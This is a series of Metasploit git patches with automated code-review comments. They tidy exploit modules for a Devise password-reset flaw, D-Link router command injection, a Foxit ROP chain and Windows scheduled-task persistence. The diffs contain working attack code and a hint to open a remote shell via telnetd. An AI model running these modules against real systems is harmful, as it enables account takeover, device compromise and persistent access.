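Review bot: Moving the 5xx message in `run_host` from `print_error` to `vprint_error` means that, without verbose mode, a host whose initial JSON request fails produces no output at all, which is indistinguishable from a host that was tested and judged not vulnerable (that result is also `vprint_status`). For a scanner this is a silent false negative; keeping one non-verbose line such as `print_error("#{rhost}:#{rport} Not tested, server replied #{res1.code}")` lets the operator tell "untested" from "clean". Dropping the explicit `25` timeout from `send_probe` also changes behaviour to whatever default `send_request_cgi` applies, which deserves a line in the commit message. `run_host` starts and ends outside these hunks.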
@@ -26,75 +26,72 @@ def initialize(info = {}) but these may require adjustment for implementations which customize them. Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database - except PostgreSQL or SQLite3. - - Tested w/ v2.2.2, 2.1.2, and 2.0.4. + except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4. }, 'Author' => [ 'joernchen', #original discovery and disclosure - 'jjarmoc', #metasploit module + 'jjarmoc' #metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-0233'], + [ 'OSVDB', '89642' ], + [ 'BID', '57577' ], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], - [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], + [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'] ], 'DisclosureDate' => 'Jan 28 2013' )) register_options( [ - OptString.new('TARGETURI', [ true, "The request URI", '/users/password']), - OptString.new('TARGETEMAIL', [true, "The email address of target account"]), + OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']), + OptString.new('TARGETEMAIL', [true, 'The email address of target account']), OptString.new('PASSWORD', [true, 'The password to set']), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), - OptInt.new('MAXINT', [true, "Max integer to try (tokens begining with a higher int will fail)", 10]) + OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10]) ], self.class) end def generate_token(account) # CSRF token from GET "/users/password/new" isn't actually validated it seems. 
- print_status("Generating reset token for #{account}") - postdata="user[email]=#{account}" res = send_request_cgi({ - 'uri' => normalize_uri(datastore['TARGETURI']), - 'method' => 'POST', - 'data' => postdata, - }) + 'uri' => normalize_uri(datastore['TARGETURI']), + 'method' => 'POST', + 'data' => postdata, + }) - unless (res) + unless res print_error("No response from server") return false end if res.code == 200 error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] - print_error("Server returned an error:") - print_error(error_text) + print_error("Server returned error") + vprint_error(error_text) return false end + return true end def clear_tokens() - print_status("Clearing existing tokens") count = 0 status = true until (status == false) do status = reset_one(Rex::Text.rand_text_alpha(rand(10) + 5)) count += 1 if status end - print_status("Cleared #{count} tokens") + vprint_status("Cleared #{count} tokens") end def reset_one(password, report=false) - print_status("Resetting password to \"#{password}\"") if report (0..datastore['MAXINT']).each{ |int_to_try| encode_pass = REXML::Text.new(password).to_s @@ -112,7 +109,8 @@ def reset_one(password, report=false) 'ctype' => 'application/xml', 'data' => xml, }) - unless (res) + + unless res print_error("No response from server") return false end @@ -123,8 +121,8 @@ def reset_one(password, report=false) # May need to tweak this for some apps... error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] if (report) && (error_text !~ /token/) - print_error("Server returned an error:") - print_error(error_text) + print_error("Server returned error") + vprint_error(error_text) return false end when 302 
@@ -136,27 +134,29 @@ def reset_one(password, report=false) end } - print_error("No active reset tokens below #{datastore['MAXINT']} remain. - Try a higher MAXINT.") if report + print_error("No active reset tokens below #{datastore['MAXINT']} remain. Try a higher MAXINT.") if report return false end def run # Clear outstanding reset tokens, helps ensure we hit the intended account. + print_status("Clearing existing tokens...") clear_tokens() if datastore['FLUSHTOKENS'] # Generate a token for our account + print_status("Generating reset token for #{datastore['TARGETEMAIL']}...") status = generate_token(datastore['TARGETEMAIL']) if status == false - print_error("Failed") + print_error("Failed to generate reset token") return end - print_good("Success") + print_good("Reset token generated successfully") # Reset a password. We're racing users creating other reset tokens. # If we didn't flush, we'll reset the account with the lowest ID that has a token. + print_status("Resetting password to \"#{datastore['PASSWORD']}\"...") status = reset_one(datastore['PASSWORD'], true) - status ? print_good("Success") : print_error("Failed") + status ? print_good("Password reset worked successfully") : print_error("Failed to reset password") end end \ No newline at end of file From 0ae473b01016f0f7ff76f370dc24f2ff1309ed60 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 09:52:17 +0100 Subject: [PATCH 377/421] info updated with rails information --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index af7a02dd0207..c242cefe8b93 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb 
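Review bot: In `run`, `print_status("Clearing existing tokens...")` is now unconditional while only `clear_tokens()` carries `if datastore['FLUSHTOKENS']`, so the console reports that tokens are being cleared even when the option is off. Put both statements under a single `if datastore['FLUSHTOKENS']` ... `end`. The relocated `print_status("Resetting password to \"#{datastore['PASSWORD']}\"...")` still writes the chosen password in clear text to the console and to any spooled log; announcing the reset without the value would avoid leaving a credential in operator logs.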
@@ -26,7 +26,10 @@ def initialize(info = {}) but these may require adjustment for implementations which customize them. Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database - except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4. + except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails + 3.2.11. Patch applied to Rails 3.2.12 should prevent exploitation of this + vulnerability, by quoting numeric values when comparing them with non numeric + values. }, 'Author' => [ @@ -40,7 +43,8 @@ def initialize(info = {}) [ 'OSVDB', '89642' ], [ 'BID', '57577' ], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], - [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'] + [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], + [ 'URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8' ] ], 'DisclosureDate' => 'Jan 28 2013' )) From d1784babea24a15dd6d875e0eb45c4b4020065a1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 20:24:49 +0100 Subject: [PATCH 378/421] little cleanup plus msftidy compliant --- .../http/dlink_dir_300_600_exec_noauth.rb | 35 ++++++++++--------- 1 file changed, 18 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index 2c0da88e4f7f..87d1f4519290 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb 
@@ -15,20 +15,22 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution', 'Description' => %q{ - Some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B are - vulnerable to OS Command injection. - You do not need credentials to the webinterface because the command.php - is accesseble without authentication. You could read the plaintext password - file. Tested versions: DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. - Hint: To get a remote shell you could start the telnetd without any authentication. + This module exploits an OS Command Injection vulnerability in some D-Link + Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in + command.php, which is accessible without authentication. This module has been + tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. + In order to get a remote shell the telnetd could be started without any + authentication. }, 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLTechProduct&cid=1197381489628&p=1197318958220&packedargs=QuickLinksParentID%3D1197318958220%26locale%3D1195806663795&pagename=DLinkEurope-DE%2FDLWrapper' ], + [ 'OSVDB', '89861' ], + [ 'EDB', '24453' ], + [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ], [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ], - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 04 2013')) 
@@ -52,23 +54,22 @@ def run { 'uri' => uri, 'method' => 'POST', - 'data' => data_cmd, + 'data' => data_cmd }) - return :abort if res.nil? - return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/) - return :abort if (res.code == 404) - + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/) + return if res.code == 404 rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return end - - if res.body.include? "end" - print_status("#{rhost}:#{rport} - Exploited successfully\n") + + if res.body.include?("end") + print_good("#{rhost}:#{rport} - Exploited successfully\n") print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n") print_line("#{rhost}:#{rport} - Output: #{res.body}") else - print_status("#{rhost}:#{rport} - Exploit failed.") + print_error("#{rhost}:#{rport} - Exploit failed.") end end end From 4074a12fd7af4e94135097ded57db9cf67f37fea Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 13 Feb 2013 14:12:52 -0600 Subject: [PATCH 379/421] Randomize some gadgets --- .../browser/foxit_reader_plugin_url_bof.rb | 56 +++++++++++-------- 1 file changed, 32 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 7e5d6353a3b9..79df79fbcfc8 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb 
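Review bot: The three bare `return if ...` guards that replace `return :abort` make `run` exit without any message when there is no response, when the `Server` header does not match, or on a 404, so the operator cannot tell an unreachable or non-matching device from a completed check. Each guard should say why it stopped, e.g. `print_error("#{rhost}:#{rport} - No response from the web server")` before returning, in the same style as the `vprint_error` in the `rescue` branch. The `begin` that pairs with that `rescue` is outside the hunk.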
@@ -92,37 +92,45 @@ def get_target(agent) return nil end + def junk + return rand_text_alpha(4).unpack("L")[0].to_i + end + + def nops + make_nops(4).unpack("N*") + end + # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) def win7_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ - 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] - 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] - 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] - 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) - 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] - 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00001000, # 0x00001000-> edx + 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] + 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] + 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] + 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] + 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (RETN offset compensation) + 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] + 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00001000, # 0x00001000-> edx 0x1000d9ec, # XOR EDX, EDX # RETN - 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (compensate) - 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x00000040, # 0x00000040-> ecx - 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00000001, # 0x00000001-> ebx - 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] - 0x1000eb81, # RETN (ROP 
NOP) [npFoxitReaderPlugin.dll] - 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x90909090, # nop - 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] + 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] + junk, + 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] + junk, + junk, + junk, + 0x41414141, # Filler (RETN offset compensation) + 0x00000040, # 0x00000040-> ecx + 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00000001, # 0x00000001-> ebx + 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] + 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] + 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] + nops, + 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] ].flatten.pack("V*") return rop_gadgets From aea76a56de82d51e0f3a3e9dd1a19c588260a963 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 13 Feb 2013 14:39:19 -0600 Subject: [PATCH 380/421] Add some docs to FtpServer --- lib/msf/core/exploit/ftpserver.rb | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb index 48517b3862ad..dadbb31dcdc7 100644 --- a/lib/msf/core/exploit/ftpserver.rb +++ b/lib/msf/core/exploit/ftpserver.rb @@ -26,11 +26,13 @@ def initialize(info = {}) ], Msf::Exploit::Remote::FtpServer) end + # (see Msf::Exploit#setup) def setup super @state = {} end + # (see TcpServer#on_client_connect) def on_client_connect(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", 
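Review bot: The new `junk` and `nops` helpers are undocumented and return different shapes: `junk` yields a single Integer, `nops` yields an Array, and the chain only packs correctly because `win7_rop_chain` calls `.flatten` before `pack("V*")`. A one-line comment on each, for example `# Returns an Array of Integers; the caller must flatten before packing`, would keep a later edit from dropping the `.flatten`. In `junk`, the trailing `.to_i` and the explicit `return` are redundant, since `unpack("L")[0]` is already an Integer and `nops` just below uses an implicit return. The closing `end` of `win7_rop_chain` is outside the hunk.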
@@ -46,6 +48,25 @@ def on_client_connect(c) c.put "220 FTP Server Ready\r\n" end + # Dispatches client requests to command handlers. + # + # Handlers should be named +on_client_command_*+, ending with a + # downcased FTP verb, e.g. +on_client_command_user+. If no handler + # exists for the given command, returns a generic default response. + # + # @example Handle SYST requests + # class Metasploit4 < Msf::Exploit + # include Msf::Exploit::Remote::FtpServer + # ... + # def on_client_command_syst(cmd_conn, arg) + # print_status("Responding to SYST request") + # buf = build_exploit_buffer(cmd_conn) + # cmd_conn.put("215 Unix Type: #{buf}\r\n") + # end + # end + # + # @param (see TcpServer#on_client_data) + # @return (see TcpServer#on_client_data) def on_client_data(c) data = c.get_once return if not data @@ -184,6 +205,15 @@ def active_data_port_for_client(c,port) end + # Create a socket for the protocol data, either PASV or PORT, + # depending on the client. + # + # @see http://tools.ietf.org/html/rfc3659 RFC 3659 + # @see http://tools.ietf.org/html/rfc959 RFC 959 + # @param c [Socket] Control connection socket + # + # @return [Socket] A connected socket for the data connection + # @return [nil] on failure def establish_data_connection(c) begin Timeout.timeout(20) do From bbf8fe0213ed884e0745b748029182313d9149cb Mon Sep 17 00:00:00 2001 From: smilingraccoon <smilingraccoon.gmail.com> Date: Wed, 13 Feb 2013 18:10:05 -0500 Subject: [PATCH 381/421] Use Post::File methods and fail_with --- .../exploits/windows/local/s4u_persistence.rb | 72 +++++++------------ 1 file changed, 26 insertions(+), 46 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 0d5189064ac6..9f00f8d5283c 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb 
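Review bot: The new comment on `establish_data_connection` says `@return [nil] on failure` but does not mention the `Timeout.timeout(20)` that opens the method body, so a reader cannot tell that a data connection which stalls presumably counts as a failure after 20 seconds. Once the rescue path is confirmed, the line could read `# @return [nil] on failure, including when no data connection is established within 20 seconds`. The method body continues outside the hunk, so how the timeout is rescued is not visible here.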
@@ -39,6 +39,7 @@ def initialize(info={}) 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], + 'DisclosureDate' => [ 'Jan 2 2013' ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -66,15 +67,13 @@ def initialize(info={}) def exploit if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) - print_error("This module only works on Vista/2008 and above") - return + fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above") end if datastore['TRIGGER'] == "event" if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? - print_error("Advanced options EVENT_LOG and EVENT_ID required for event") print_status("The properties of any event in the event viewer will contain this information") - return + fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event") end end @@ -88,8 +87,7 @@ def exploit xml_path,rexe_path = generate_path(rexename) # Upload REXE to victim fs - upload_response = upload_rexe(rexe_path, payload) - return if not upload_response + upload_rexe(rexe_path, payload) # Create basic XML outline xml = create_xml(rexe_path) @@ -98,16 +96,13 @@ def exploit xml = add_xml_triggers(xml) # Write XML to victim fs, if fail clean up - if not write_xml(xml, xml_path) - delete_file(rexe_path) - return - end + write_xml(xml, xml_path, rexe_path) # Name task with Opt or give random name schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) # Create task with modified XML - task = create_task(xml_path, schname, rexe_path) + create_task(xml_path, schname, rexe_path) end ############################################################## 
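Review bot: `'DisclosureDate' => [ 'Jan 2 2013' ]` passes an Array where the other modules in this series pass a plain String (for example `'DisclosureDate' => 'Jan 28 2013'`), so code that parses or prints the field may receive a type it does not expect. The line should be `'DisclosureDate' => 'Jan 2 2013',`.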
@@ -115,16 +110,11 @@ def exploit # Returns name def generate_rexename - if datastore['REXENAME'].nil? - rexename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - return rexename - elsif datastore['REXENAME'] =~ /\.exe$/ - rexename = datastore['REXENAME'] - return rexename - else + rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + if not rexename =~ /\.exe$/ print_warning("#{datastore['REXENAME']} isn't an exe") - return rexename end + return rexename end ############################################################## @@ -133,7 +123,7 @@ def generate_rexename def generate_path(rexename) # generate a path to write payload and xml - path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path = datastore['PATH'] || expand_path("%TEMP%") xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path @@ -146,19 +136,15 @@ def generate_path(rexename) def upload_rexe(path, payload) vprint_status("Uploading #{path}") if file? path - print_error("File #{path} already exists...exiting") - return false + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin - fd = client.fs.file.new(path, "wb") - fd.write(payload) - fd.close - rescue - print_error("Could not upload to #{path}") - return false + write_file(path, payload) + rescue => e + puts e + fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") - return true end ############################################################## 
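Review bot: In `upload_rexe` the new `rescue => e` branch calls `puts e`, which writes directly to the process's standard output instead of going through the module's own output methods that the rest of this file uses. Replacing it with `vprint_error("#{e.class}: #{e}")` keeps the detail and respects the verbose setting; alternatively the message can be appended to the `fail_with` text. The `write_xml` rescue in a later hunk has the opposite problem: it is a bare `rescue` that discards the exception entirely.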
@@ -317,21 +303,18 @@ def create_trigger_event_tags(log, line, xml) # Takes the XML and a path and writes file to filesystem # Returns boolean for success - def write_xml(xml, path) + def write_xml(xml, path, rexe_path) + if file? path + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") + end begin - if file? path - print_error("File #{path} already exists...exiting") - return false - end - fd = session.fs.file.new(path, "wb") - fd.write(xml) - fd.close + write_file(path, xml) rescue - print_error("Issues writing XML to #{path}") - return false + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}") end print_status("Successfully wrote XML file to #{path}") - return true end ############################################################## @@ -340,12 +323,10 @@ def write_xml(xml, path) def delete_file(path) begin - session.fs.file.rm(path) + file_rm(path) rescue print_warning("Could not delete file #{path}, delete manually") - return false end - return true end ############################################################## @@ -381,14 +362,13 @@ def create_task(path, schname, rexe_path) :delete_commands => del_task } ) - return true elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ print_error("The scheduled task name is already in use") # Clean up delete_file(rexe_path) delete_file(path) else - print_error("Issues creating task using XML file schtasks") + error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" print_warning("Security log can restricted by UAC, try a different trigger") @@ -396,7 +376,7 @@ def create_task(path, schname, rexe_path) # Clean up delete_file(rexe_path) delete_file(path) - return false + fail_with(Exploit::Failure::Unknown, error) end end end \ No newline at end of file 
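Review bot: The comment above `write_xml` still reads "Takes the XML and a path" and "Returns boolean for success", but the method now takes a third argument and no longer returns `true`/`false`; it calls `fail_with` on error. The comment should be updated, for example `# Takes the XML, its destination path and the path of the uploaded exe; removes the exe and fails the module on error`. The same applies to `delete_file` in the next hunk, whose boolean returns were also removed.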
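Review bot: The UAC hint in the `else` branch of `create_task` tests `datastore['TRIGGER'] == "Event"`, while `exploit` compares the same option against `"event"`; unless the value is normalised somewhere not shown, the `print_warning` can never fire. The condition should use the same spelling, `if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "event"`. `create_task` begins outside the hunk.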
From e78cbdd14d40c544c20170888af5bb0ddb039f8d Mon Sep 17 00:00:00 2001 From: smilingraccoon <smilingraccoon.gmail.com> Date: Wed, 13 Feb 2013 18:17:38 -0500 Subject: [PATCH 382/421] missed one line --- modules/exploits/windows/local/s4u_persistence.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 9f00f8d5283c..5556acfbdbb3 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -363,10 +363,11 @@ def create_task(path, schname, rexe_path) } ) elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ - print_error("The scheduled task name is already in use") # Clean up delete_file(rexe_path) delete_file(path) + error = "The scheduled task name is already in use" + fail_with(Exploit::Failure::Unknown, error) else error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") From c2f8e4adbdcb8add16d7fff2abaddc72bc514e3b Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Wed, 13 Feb 2013 22:30:54 -0600 Subject: [PATCH 383/421] Minor - Note Rails 3.1.11 patch in Description. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index c242cefe8b93..e301b59c2bd5 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb 
@@ -27,9 +27,9 @@ def initialize(info = {}) Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails - 3.2.11. Patch applied to Rails 3.2.12 should prevent exploitation of this - vulnerability, by quoting numeric values when comparing them with non numeric - values. + 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation + of this vulnerability, by quoting numeric values when comparing them with + non numeric values. }, 'Author' => [ @@ -44,7 +44,8 @@ def initialize(info = {}) [ 'BID', '57577' ], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], - [ 'URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8' ] + [ 'URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8' ], + [ 'URL', 'https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8'] ], 'DisclosureDate' => 'Jan 28 2013' )) From 7b2c1afadb99a73f8f9ab3e55b96550e892b7494 Mon Sep 17 00:00:00 2001 From: Thomas McCarthy <smilingraccoon@gmail.com> Date: Thu, 14 Feb 2013 09:16:47 -0500 Subject: [PATCH 384/421] I'm an idiot, fix logon xpath --- modules/exploits/windows/local/s4u_persistence.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 5556acfbdbb3..1d5d2cc0bb29 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb 
@@ -193,7 +193,7 @@ def add_xml_triggers(xml) when 'logon' # Trigger based on winlogon event, checks windows license key after logon print_status("This trigger triggers on event 4101 which validates the Windows license") - line = "(EventID=4101) and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" + line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" xml = create_trigger_event_tags("Application", line, xml) when 'lock' @@ -380,4 +380,4 @@ def create_task(path, schname, rexe_path) fail_with(Exploit::Failure::Unknown, error) end end -end \ No newline at end of file +end From e8ccfae048f93948164bbc4d279397f502feaa8c Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:38:17 -0400 Subject: [PATCH 385/421] Fix spelling problems --- modules/auxiliary/gather/dns_srv.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index 71f95c161dc9..eac4bbe21429 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -16,7 +16,7 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Reverse Lookup', 'Description' => %q{ - This module enumerates common DNS Service Records. + The module enumerates common DNS Service Records. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE 
@@ -24,14 +24,14 @@ def initialize(info = {}) register_options( [ - OptString.new('DOMAIN', [ true, "The target domain name"]), - OptBool.new( 'ALL_NS', [ false, "Run against all Nameservers for the given domain",false]), + OptString.new('DOMAIN', [ true, "The target domain name."]), + OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]), ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 3]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 4]), + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 3]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 4]), ], self.class) end From 1872b137f5be2515dfe759a93d82934ed3e6aae7 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:41:17 -0400 Subject: [PATCH 386/421] Fix spelling problems --- modules/auxiliary/gather/dns_info.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index a6f0ff2b80bd..fd11a82a7122 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -16,8 +16,8 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Base Information', 'Description' => %q{ - This module enumerates basic DNS information for a given Domain. Information - enumerated is A, AAAA, NS and MX Records for the given domain. + The module enumerates basic DNS information for a given domain. Information + enumerated is A, AAAA, NS and MX records for the given domain. }, 'Author' => [ 'Carlos Perez 